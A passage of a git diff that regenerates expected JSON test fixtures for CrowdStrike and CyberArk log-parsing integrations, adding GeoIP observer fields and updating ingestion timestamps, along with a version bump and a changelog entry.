"{\"AuthenticationId\":\"326190744\",\"AuthenticationUuid\":\"98467113-C771-4845-B71B-89B3CE9F93C9\",\"AuthenticationUuidAsString\":\"13714698-71C7-4548-B71B-89B3CE9F93C9\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"Entitlements\":\"15\",\"UID\":\"326190744\",\"UserPrincipal\":\"user8@dom6\",\"UserSid\":\"S-1-5-21-3629339319-2376021926-2724479216-652382488\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"UserIdentityMacV2\",\"timestamp\":\"1604855355388\"}", "created": "2020-11-08T17:09:15.388Z", "kind": "event", @@ -9441,16 +10629,31 @@ "id": "326190744", "email": "user8@dom6", "domain": "dom6" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffffcdb543135e7fcdf8e5a8fbdb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffcdb543135e7fcdf8e5a8fbdb", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:57.555Z", "os": { @@ -9471,7 +10674,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151339800Z", + "ingested": "2021-12-14T14:41:26.533799813Z", "original": "{\"BootArgs\":\" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1874387338\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"MachineDomain\":\"\",\"aid\":\"ffffffffcdb543135e7fcdf8e5a8fbdb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostInfo\",\"id\":\"ffffffff-1111-11eb-9bbd-061290dcd983\",\"name\":\"HostInfoV2\",\"timestamp\":\"1604855157555\"}", "created": "2020-11-08T17:05:57.555Z", "kind": "event", @@ -9522,12 +10725,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff16bf4c7bb5ad755a4722025c", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff16bf4c7bb5ad755a4722025c", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T15:57:10.593Z", "file": { @@ -9559,7 +10771,7 @@ }, "event": { "action": "GenericFileWritten", - "ingested": "2021-12-09T13:36:11.151346200Z", + "ingested": "2021-12-14T14:41:26.533800212Z", "original": "{\"AuthenticationId\":\"703298\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2642284486\",\"ContextProcessId\":\"1161025471861\",\"ContextThreadId\":\"34929528116709\",\"ContextTimeStamp\":\"1604851030.593\",\"DiskParentDeviceInstanceId\":\"USB\\\\VID_1058\\u0026PID_2621\\\\57583431453939315A4C5255\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"262fbc677256cf4c8d6c6a227285a072c06830873b000000\",\"FileObject\":\"18446664963104449168\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"1\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"517029\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume5\\\\01.png.tmp$$\",\"TokenType\":\"1\",\"UserName\":\"user9\",\"aid\":\"ffffffff16bf4c7bb5ad755a4722025c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"GenericFileWritten\",\"id\":\"ffffffff-1111-11eb-800a-06cecfd73923\",\"name\":\"GenericFileWrittenV11\",\"timestamp\":\"1604851031298\"}", "id": "ffffffff-1111-11eb-800a-06cecfd73923", "created": "2020-11-08T15:57:11.298Z" @@ -9586,30 +10798,33 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffff896b43725b83c79aa79959da", + "type": "agent", + "version": "1007.3.0011603.1" + }, "process": { "entity_id": "1717987648455", "thread": { "id": 55064470042288 } }, + "@timestamp": "2020-11-08T15:54:59.164Z", "os": { "type": "windows" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff896b43725b83c79aa79959da", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2020-11-08T15:54:59.164Z", "ecs": { "version": "1.12.0" }, @@ -9625,7 +10840,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151387500Z", + "ingested": "2021-12-14T14:41:26.533800598Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"666346415\",\"ContextProcessId\":\"1717987648455\",\"ContextThreadId\":\"55064470042288\",\"ContextTimeStamp\":\"1604850899.164\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume27\",\"aid\":\"ffffffff896b43725b83c79aa79959da\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeUnmounted\",\"id\":\"ffffffff-1111-11eb-9f70-0634389d9ea9\",\"name\":\"FsVolumeUnmountedV2\",\"timestamp\":\"1604850899812\"}", "created": "2020-11-08T15:54:59.812Z", "kind": "event", @@ -9646,30 +10861,39 @@ "EffectiveTransmissionClass": "3", "Entitlements": "15", "cid": "ffffffff30a3407dae27d0503611022d" - } - }, - { - "process": { - "entity_id": "66426035996442255" - }, - "os": { - "type": "macos" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff899541b94b9adff8922aa70a", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0009906.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff899541b94b9adff8922aa70a", + "type": "agent", + "version": "1007.4.0009906.1" + }, + "process": { + "entity_id": "66426035996442255" }, "@timestamp": "2020-11-08T15:58:18.548Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -9685,7 +10909,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151393400Z", + "ingested": "2021-12-14T14:41:26.533800980Z", "original": "{\"ConfigBuild\":\"1007.4.0009906.1\",\"ConfigStateHash\":\"3429017943\",\"ContextProcessId\":\"66426035996442255\",\"ContextTimeStamp\":\"1604851098.548\",\"Entitlements\":\"15\",\"aid\":\"ffffffff899541b94b9adff8922aa70a\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"FirewallDisabled\",\"id\":\"ffffffff-1111-11eb-9d4c-02f402df8c1f\",\"name\":\"FirewallDisabledMacV1\",\"timestamp\":\"1604851040625\"}", "created": "2020-11-08T15:57:20.625Z", "kind": "event", @@ -9705,20 +10929,31 @@ "ConfigStateHash": "3429017943", "Entitlements": "15", "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "fffffffffffaaaaaaaaabbbbbbbb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "6.31.14404.0", "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "os": { - "type": "macos", - "version": "Big Sur (11.0)" + "ip": "67.43.156.14", + "serial_number": "fffffffffffaaaaaaaaabbbbbbbb", + "type": "agent", + "version": "6.31.14404.0" }, "ecs": { "version": "1.12.0" @@ -9732,6 +10967,10 @@ "67.43.156.14" ] }, + "os": { + "type": "macos", + "version": "Big Sur (11.0)" + }, "host": { "geo": { "continent_name": "North America", @@ -9743,7 +10982,7 @@ "hostname": "mac1" }, "event": { - "ingested": "2021-12-09T13:36:11.151397900Z", + "ingested": "2021-12-14T14:41:26.533801375Z", "original": "{\"AgentLoadFlags\":\"0\",\"AgentLocalTime\":\"1636436839.9529998\",\"AgentTimeOffset\":\"125.319\",\"AgentVersion\":\"6.31.14404.0\",\"BiosManufacturer\":\"Apple Inc.\",\"BiosVersion\":\"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)\",\"ChassisType\":\"Laptop\",\"City\":\"San Francisco\",\"ComputerName\":\"mac1\",\"ConfigBuild\":\"1007.4.0014404.1\",\"ConfigIDBuild\":\"14404\",\"Continent\":\"North America\",\"Country\":\"United States\",\"FalconGroupingTags\":\"-\",\"FirstSeen\":\"1625682391.0\",\"HostHiddenStatus\":\"Visible\",\"MachineDomain\":\"none\",\"OU\":\"none\",\"PointerSize\":\"none\",\"ProductType\":\"1\",\"SensorGroupingTags\":\"-\",\"ServicePackMajor\":\"none\",\"SiteName\":\"none\",\"SystemManufacturer\":\"Apple Inc.\",\"SystemProductName\":\"MacBookPro16,2\",\"Time\":\"1636448427.3539999\",\"Timezone\":\"America/Los_Angeles\",\"Version\":\"Big Sur (11.0)\",\"aid\":\"fffffffffffaaaaaaaaabbbbbbbb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022ff\",\"event_platform\":\"Mac\"}" }, "crowdstrike": { diff --git a/packages/crowdstrike/manifest.yml b/packages/crowdstrike/manifest.yml index 7ad725c64c4..7d7123692cf 100644 --- a/packages/crowdstrike/manifest.yml +++ b/packages/crowdstrike/manifest.yml @@ -1,6 +1,6 @@ name: crowdstrike title: CrowdStrike Logs -version: 1.1.1 +version: 1.1.2 description: Collect and parse falcon logs from Crowdstrike products with Elastic Agent. type: integration format_version: 1.0.0 diff --git a/packages/cyberark/changelog.yml b/packages/cyberark/changelog.yml index 4df9823faf1..32fd926e7ec 100644 --- a/packages/cyberark/changelog.yml +++ b/packages/cyberark/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.4.5" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.4.4" changes: - description: Uniform with guidelines diff --git a/packages/cyberark/data_stream/corepas/_dev/test/pipeline/test-generated.log-expected.json b/packages/cyberark/data_stream/corepas/_dev/test/pipeline/test-generated.log-expected.json index 789d5b35c95..5f0302c05d9 100644 --- a/packages/cyberark/data_stream/corepas/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cyberark/data_stream/corepas/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "2016-01-29 06:09:59.732538723 +0000 UTC eacommod1428.lan %CYBERARK: MessageID=\"188\";exercita 1.1332\",ProductAccount=\"itv\",ProductProcess=\"odoco\",EventId=\"ria\",EventClass=\"min\",EventSeverity=\"low\",EventMessage=\"allow\",ActingUserName=\"utl\",ActingAddress=\"10.208.15.216\",ActionSourceUser=\"tation\",ActionTargetUser=\"quasiarc\",ActionObject=\"liqua\",ActionSafe=\"ciade\",ActionLocation=\"turadipi\",ActionCategory=\"aeca\",ActionRequestId=\"idi\",ActionReason=\"pexe\",ActionExtraDetails=\"nes\"", "event": { - "ingested": "2021-06-09T10:19:22.409979200Z" + "ingested": "2021-12-14T14:41:55.823507474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"168\";Version=1.259;Message=block;Issuer=dolore;Station=10.92.136.230;File=ritquiin;Safe=umqui;Location=reeufugi;Category=mdolo;RequestId=mqui;Reason=nci;Severity=very-high;SourceUser=litesse;TargetUser=orev;GatewayStation=10.175.75.18;TicketID=deF;PolicyID=sist;UserName=nnumqu;LogonDomain=iatnu3810.mail.localdomain;Address=volup208.invalid;CPMStatus=eosquir;Port=5191;Database=umdo;DeviceType=itessequ;ExtraDetails=vol;", "event": { - "ingested": "2021-06-09T10:19:22.410003600Z" + "ingested": "2021-12-14T14:41:55.823539368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nibus 2016-02-26 20:15:08.252538723 +0000 UTC mipsumq3879.internal.localdomain %CYBERARK: MessageID=\"26\";Version=1.7269;Message=accept;Issuer=incid;Station=10.51.132.10;File=utper;Safe=squame;Location=ntex;Category=eius;RequestId=luptat;Reason=emape;Severity=low;SourceUser=incidi;TargetUser=nse;GatewayStation=10.46.185.46;TicketID=temvel;PolicyID=iatu;UserName=serror;LogonDomain=anti4454.api.example;Address=tetu5280.www5.invalid;CPMStatus=tionulam;Port=2548;Database=byC;DeviceType=tinculp;ExtraDetails=tur;", "event": { - "ingested": "2021-06-09T10:19:22.410011Z" + "ingested": "2021-12-14T14:41:55.823540017Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-03-12 03:17:42.512538723 +0000 UTC minim7868.www5.localdomain %CYBERARK: MessageID=\"184\";Version=1.6713;Message=deny;Issuer=psumquia;Station=10.53.192.140;File=con;Safe=uia;Location=quiavo;Category=issusci;RequestId=mol;Reason=taspe;Severity=high;SourceUser=psumq;TargetUser=atcup;GatewayStation=10.155.236.240;TicketID=tatno;PolicyID=dquiac;UserName=ptass;LogonDomain=uam6303.api.lan;Address=llu4762.mail.localdomain;CPMStatus=scivel;Port=5695;Database=aperi;DeviceType=iveli;ExtraDetails=llumd;", "event": { - "ingested": "2021-06-09T10:19:22.410019200Z" + "ingested": "2021-12-14T14:41:55.823540445Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"161\";emaper 1.2638\",ProductAccount=\"eos\",ProductProcess=\"enimad\",EventId=\"rmagni\",EventClass=\"sit\",EventSeverity=\"medium\",EventMessage=\"cancel\",ActingUserName=\"oremips\",ActingAddress=\"10.81.199.122\",ActionSourceUser=\"aquaeabi\",ActionTargetUser=\"giatq\",ActionObject=\"quid\",ActionSafe=\"fug\",ActionLocation=\"uatDuis\",ActionCategory=\"ude\",ActionRequestId=\"maveniam\",ActionReason=\"uian\",ActionExtraDetails=\"tempo\"", "event": { - "ingested": "2021-06-09T10:19:22.410025600Z" + "ingested": "2021-12-14T14:41:55.823540856Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eetd 2016-04-09 17:22:51.032538723 +0000 UTC eip1448.internal.local %CYBERARK: MessageID=\"139\";Version=1.3491;Message=deny;Issuer=tcupida;Station=10.139.186.201;File=ect;Safe=reetdolo;Location=nrepreh;Category=obeataev;RequestId=lor;Reason=uidexea;Severity=medium;SourceUser=natura;TargetUser=aboris;GatewayStation=10.172.14.142;TicketID=ssitaspe;PolicyID=gitsedqu;UserName=uam;LogonDomain=temq1198.internal.example;Address=aquaeab2275.www5.domain;CPMStatus=ehend;Port=4091;Database=isiu;DeviceType=nimadmi;ExtraDetails=iatisu;", "event": { - "ingested": "2021-06-09T10:19:22.410031600Z" + "ingested": "2021-12-14T14:41:55.823541285Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"106\";Version=1.6875;Message=accept;Issuer=ipis;Station=10.47.76.251;File=eataevit;Safe=uptatev;Location=uovol;Category=dmi;RequestId=olab;Reason=mquisnos;Severity=medium;SourceUser=ore;TargetUser=etconsec;GatewayStation=10.104.111.129;TicketID=mUt;PolicyID=usmodte;UserName=ele;LogonDomain=tenbyCic5882.api.home;Address=amquisno3338.www5.lan;CPMStatus=nonnu;Port=776;Database=riat;DeviceType=luptatem;ExtraDetails=umdolor;", "event": { - "ingested": "2021-06-09T10:19:22.410038300Z" + "ingested": "2021-12-14T14:41:55.823541703Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inB 2016-05-08 07:27:59.552538723 +0000 UTC deomni124.www.example %CYBERARK: MessageID=\"74\";tae 1.1382\",ProductAccount=\"animi\",ProductProcess=\"oluptate\",EventId=\"ofdeF\",EventClass=\"tion\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"quiratio\",ActingAddress=\"10.116.120.216\",ActionSourceUser=\"qua\",ActionTargetUser=\"umdo\",ActionObject=\"sed\",ActionSafe=\"apariat\",ActionLocation=\"mol\",ActionCategory=\"pteursi\",ActionRequestId=\"onse\",ActionReason=\"rumet\",ActionExtraDetails=\"oll\"", "event": { - "ingested": "2021-06-09T10:19:22.410044100Z" + "ingested": "2021-12-14T14:41:55.823542083Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Ciceroi 2016-05-22 14:30:33.812538723 +0000 UTC aveniam1436.www.test %CYBERARK: MessageID=\"144\";Version=1.5529;Message=cancel;Issuer=taevi;Station=10.62.54.220;File=ehenderi;Safe=pidatat;Location=gni;Category=tquiinea;RequestId=mquaera;Reason=dun;Severity=medium;SourceUser=Duisau;TargetUser=psum;GatewayStation=10.57.40.29;TicketID=undeo;PolicyID=loremip;UserName=rnatura;LogonDomain=isqu7224.localdomain;Address=idolores3839.localdomain;CPMStatus=metcon;Port=2424;Database=emeumfug;DeviceType=upta;ExtraDetails=omn;", "event": { - "ingested": "2021-06-09T10:19:22.410050Z" + "ingested": "2021-12-14T14:41:55.823542469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ons 2016-06-05 21:33:08.072538723 +0000 UTC tessec3539.home %CYBERARK: MessageID=\"240\";nsect 1.6476\",ProductAccount=\"tnon\",ProductProcess=\"ionul\",EventId=\"nibus\",EventClass=\"edquiano\",EventSeverity=\"medium\",EventMessage=\"cancel\",ActingUserName=\"ema\",ActingAddress=\"10.74.237.180\",ActionSourceUser=\"nsequu\",ActionTargetUser=\"cup\",ActionObject=\"boNemoen\",ActionSafe=\"uid\",ActionLocation=\"rors\",ActionCategory=\"onofd\",ActionRequestId=\"taed\",ActionReason=\"lup\",ActionExtraDetails=\"remeumf\"", "event": { - "ingested": "2021-06-09T10:19:22.410055600Z" + "ingested": "2021-12-14T14:41:55.823542948Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-06-20 04:35:42.332538723 +0000 UTC sectetur3333.mail.example %CYBERARK: MessageID=\"61\";edqui 1.7780\",ProductAccount=\"lor\",ProductProcess=\"fugit\",EventId=\"ido\",EventClass=\"paqu\",EventSeverity=\"high\",EventMessage=\"allow\",ActingUserName=\"remeum\",ActingAddress=\"10.18.165.35\",ActionSourceUser=\"admi\",ActionTargetUser=\"modocons\",ActionObject=\"elaudant\",ActionSafe=\"tinvol\",ActionLocation=\"dolore\",ActionCategory=\"abor\",ActionRequestId=\"iqui\",ActionReason=\"etc\",ActionExtraDetails=\"etM\"", "event": { - "ingested": "2021-06-09T10:19:22.410062100Z" + "ingested": "2021-12-14T14:41:55.823543336Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-07-04 11:38:16.592538723 +0000 UTC xercitat4824.local %CYBERARK: MessageID=\"90\";ostr 1.4979\",ProductAccount=\"onproide\",ProductProcess=\"luptat\",EventId=\"itaut\",EventClass=\"imaven\",EventSeverity=\"high\",EventMessage=\"deny\",ActingUserName=\"tema\",ActingAddress=\"10.74.253.127\",ActionSourceUser=\"tfug\",ActionTargetUser=\"icab\",ActionObject=\"mwr\",ActionSafe=\"fugi\",ActionLocation=\"inculpaq\",ActionCategory=\"agna\",ActionRequestId=\"tionemu\",ActionReason=\"eomnisis\",ActionExtraDetails=\"mqui\"", "event": { - "ingested": "2021-06-09T10:19:22.410067400Z" + "ingested": "2021-12-14T14:41:55.823543952Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "errorsi 2016-07-18 18:40:50.852538723 +0000 UTC des5377.lan %CYBERARK: MessageID=\"385\";Version=1.1697;Message=block;Issuer=ono;Station=10.189.109.245;File=emaperi;Safe=tame;Location=\"tinvol\";Category=tectobe;RequestId=colabor;Reason=iusmodt;Severity=medium;GatewayStation=10.92.8.15;TicketID=agnaali;PolicyID=llitani;UserName=inima;LogonDomain=tlabo6088.www.localdomain;Address=Lor5841.internal.example;CPMStatus=sunt;Port=\"3075\";Database=uines;DeviceType=nsec;ExtraDetails=onse", "event": { - "ingested": "2021-06-09T10:19:22.410072400Z" + "ingested": "2021-12-14T14:41:55.823544349Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2 01:43:25 tat %CYBERARK: MessageID=\"190\";tion 1.1761\",ProductAccount=\"upt\",ProductProcess=\"uiineavo\",EventId=\"tisetq\",EventClass=\"irati\",EventSeverity=\"low\",EventMessage=\"accept\",ActingUserName=\"giatquov\",ActingAddress=\"10.21.78.128\",ActionSourceUser=\"riat\",ActionTargetUser=\"taut\",ActionObject=\"oreseos\",ActionSafe=\"uames\",ActionLocation=\"tati\",ActionCategory=\"utaliqu\",ActionRequestId=\"oriosamn\",ActionReason=\"deFinibu\",ActionExtraDetails=\"iadese\"", "event": { - "ingested": "2021-06-09T10:19:22.410077300Z" + "ingested": "2021-12-14T14:41:55.823544974Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"256\";eporroqu 1.4200\",ProductAccount=\"hil\",ProductProcess=\"atquovo\",EventId=\"suntinc\",EventClass=\"xeac\",EventSeverity=\"medium\",EventMessage=\"deny\",ActingUserName=\"tatn\",ActingAddress=\"10.18.109.121\",ActionSourceUser=\"ents\",ActionTargetUser=\"pida\",ActionObject=\"nse\",ActionSafe=\"sinto\",ActionLocation=\"emoeni\",ActionCategory=\"oenimips\",ActionRequestId=\"utlabore\",ActionReason=\"ecillu\",ActionExtraDetails=\"quip\"", "event": { - "ingested": "2021-06-09T10:19:22.410082400Z" + "ingested": "2021-12-14T14:41:55.823545360Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"105\";Version=1.3727;Message=cancel;Issuer=iunt;Station=10.63.37.192;File=tio;Safe=orinrepr;Location=conse;Category=rumetM;RequestId=equi;Reason=agnaali;Severity=medium;SourceUser=sitvolup;TargetUser=reetd;GatewayStation=10.225.115.13;TicketID=maccusa;PolicyID=uptat;UserName=equep;LogonDomain=iavolu5352.localhost;Address=rpo79.mail.example;CPMStatus=siarchi;Port=2289;Database=aliqu;DeviceType=olupta;ExtraDetails=mipsumd;", "event": { - "ingested": "2021-06-09T10:19:22.410087200Z" + "ingested": "2021-12-14T14:41:55.823545761Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "remi 2016-09-13 22:51:07.892538723 +0000 UTC saute7154.internal.lan %CYBERARK: MessageID=\"105\";Version=1.3219;Message=deny;Issuer=run;Station=10.47.202.102;File=quirat;Safe=llu;Location=licab;Category=eirure;RequestId=conseq;Reason=oidentsu;Severity=medium;SourceUser=aaliquaU;TargetUser=ntor;GatewayStation=10.95.64.124;TicketID=psaquae;PolicyID=ationemu;UserName=ice;LogonDomain=estiae3750.api.corp;Address=tionof7613.domain;CPMStatus=lapari;Port=2335;Database=ite;DeviceType=ationul;ExtraDetails=iquipex;", "event": { - "ingested": "2021-06-09T10:19:22.410092200Z" + "ingested": "2021-12-14T14:41:55.823546276Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "adol 2016-09-28 05:53:42.152538723 +0000 UTC doloremi7402.www.test %CYBERARK: MessageID=\"376\";Version=1.6371;Message=block;Issuer=itquiin;Station=10.106.239.55;File=taevit;Safe=rinrepre;Location=etconse;Category=tincu;RequestId=ari;Reason=exercit;Severity=low;GatewayStation=10.244.114.61;TicketID=oluptate;PolicyID=onseq;UserName=serunt;LogonDomain=aquaeabi7735.internal.lan;Address=acc7692.home;CPMStatus=amest;Port=\"4147\";Database=itame;DeviceType=intoc;ExtraDetails=oluptas;", "event": { - "ingested": "2021-06-09T10:19:22.410097300Z" + "ingested": "2021-12-14T14:41:55.823546731Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-10-12 12:56:16.412538723 +0000 UTC luptasn2126.mail.home %CYBERARK: MessageID=\"24\";Version=1.821;Message=allow;Issuer=ione;Station=10.125.160.129;File=suntexp;Safe=duntut;Location=magni;Category=pisciv;RequestId=iquidex;Reason=radipisc;Severity=low;SourceUser=nti;TargetUser=abi;GatewayStation=10.53.168.235;TicketID=fugitse;PolicyID=veniamq;UserName=one;LogonDomain=etMalor4236.www5.host;Address=quatD4191.local;CPMStatus=tenima;Port=5685;Database=sperna;DeviceType=eabilloi;ExtraDetails=estia;", "event": { - "ingested": "2021-06-09T10:19:22.410102800Z" + "ingested": "2021-12-14T14:41:55.823547168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orem 2016-10-26 19:58:50.672538723 +0000 UTC beata6448.mail.test %CYBERARK: MessageID=\"197\";Version=1.1123;Message=allow;Issuer=tasuntex;Station=10.227.177.121;File=boN;Safe=eprehend;Location=aevit;Category=aboN;RequestId=ihilmo;Reason=radi;Severity=low;SourceUser=uames;TargetUser=iduntu;GatewayStation=10.33.245.220;TicketID=giatnu;PolicyID=ulapa;UserName=liqui;LogonDomain=quioffi1359.internal.lan;Address=eturadi6608.mail.host;CPMStatus=aera;Port=3366;Database=rvel;DeviceType=uid;ExtraDetails=onsecte;", "event": { - "ingested": "2021-06-09T10:19:22.410107900Z" + "ingested": "2021-12-14T14:41:55.823547556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 edo %CYBERARK: MessageID=\"411\";Version=1.5071;Message=allow;Issuer=econs;Station=\"10.98.182.220\";File=\"untex\";Safe=\"quiratio\";Location=\"boree\";Category=\"eco\";RequestId=Utenimad;Reason=orpor;Severity=\"low\";GatewayStation=\"10.167.85.181\";TicketID=emvel;PolicyID=\"tmollita\";UserName=fde;LogonDomain=\"nsecte3304.mail.corp\";Address=\"eroi176.example\";CPMStatus=\"non\";Port=\"3341\";Database=equat;DeviceType=derit;ExtraDetails=\"Command=dexea;ConnectionComponentId=atcu;DstHost=labor;ProcessId=6501;ProcessName=laboree.exe;Protocol=tcp;PSMID=intocc;RDPOffset=liqu;SessionID=eporr;SrcHost=xeacomm6855.api.corp;User=utlabor;VIDOffset=rau;\"", "event": { - "ingested": "2021-06-09T10:19:22.410113200Z" + "ingested": "2021-12-14T14:41:55.823547959Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 aeabi %CYBERARK: MessageID=\"111\";eiu 1.4456\",ProductAccount=\"iciadese\",ProductProcess=\"quidolor\",EventId=\"tessec\",EventClass=\"olupta\",EventSeverity=\"high\",EventMessage=\"block\",ActingUserName=\"icabo\",ActingAddress=\"10.89.208.95\",ActionSourceUser=\"eleum\",ActionTargetUser=\"sintoc\",ActionObject=\"volupt\",ActionSafe=\"siste\",ActionLocation=\"uiinea\",ActionCategory=\"Utenima\",ActionRequestId=\"volupta\",ActionReason=\"rcitati\",ActionExtraDetails=\"eni\"", "event": { - "ingested": "2021-06-09T10:19:22.410118700Z" + "ingested": "2021-12-14T14:41:55.823548419Z" + 